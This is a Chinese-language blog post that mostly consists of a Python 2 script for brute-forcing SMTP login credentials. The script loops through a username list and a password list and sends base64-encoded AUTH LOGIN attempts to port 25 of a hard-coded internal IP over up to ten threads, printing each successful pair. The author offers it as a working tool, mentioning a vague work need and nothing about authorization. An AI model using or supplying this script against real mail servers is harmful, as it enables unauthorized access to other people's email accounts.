smtp暴力猜测脚本

最新推荐文章于 2022-07-22 08:59:16 发布

mgxcool

最新推荐文章于 2022-07-22 08:59:16 发布

阅读量840

点赞数

分类专栏：网络安全文章标签： user file login import stream python

本文链接：https://blog.csdn.net/mgxcool/article/details/7318184

版权

网络安全专栏收录该内容

23 篇文章 3 订阅

订阅专栏

工作中要用到smtp暴力猜测工具，找了很多资源都不支持smtp协议，好不容易找到一个也是python写的，但是因为太强大了不会用。

所以只好自己写了一个。平时不怎么写代码，很多地方处理的都不是很好，就作为一个参考吧。

import socket
import base64
import threading
import time

def login(user,passwd,host):
    user = user[0:-1]
    passwd = passwd[0:-1]
    print "begin guessing using username %s and password %s"%(user,passwd)
    new_soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    user64 = base64.encodestring(user)[0:-1]+'\r\n'
    passwd64 = base64.encodestring(passwd)[0:-1]+'\r\n'
    try:
        new_soc.connect((host,25))
        new_soc.recv(1024)
        new_soc.sendall("EHLO computer\r\n")
        new_soc.recv(1024)
        new_soc.sendall('AUTH LOGIN\r\n')
        new_soc.recv(1024)
        new_soc.sendall(user64)
        new_soc.recv(1024)
        new_soc.sendall(passwd64)
        result = new_soc.recv(1024)
    except:
        print "socket error"
        return 0
    if result.find(" successful") == -1:
        return 0
    else:
        print "congratulation! usr %s password %s"%(user,passwd)
        return 1

def start_guess((user_name_file,user_pass_file,host)):
    count = 0
    try:
        user_file = open(user_name_file,'r')
    except:
        print "unable to open "+user_name_file
    try:
        pass_file = open(user_pass_file)
    except:
        print "unable to open "+user_pass_file
    for usr in user_file.readlines():
        pass_file.seek(0)
        for passwd in pass_file.readlines():
            while True:
                if threading.activeCount()<10:
                    threading.Thread(target=login,args=(usr,passwd,host)).start()
                    break;
                else:
                    time.sleep(1)

 
if __name__ == "__main__":
    start_guess(('name','pass','10.14.69.203'))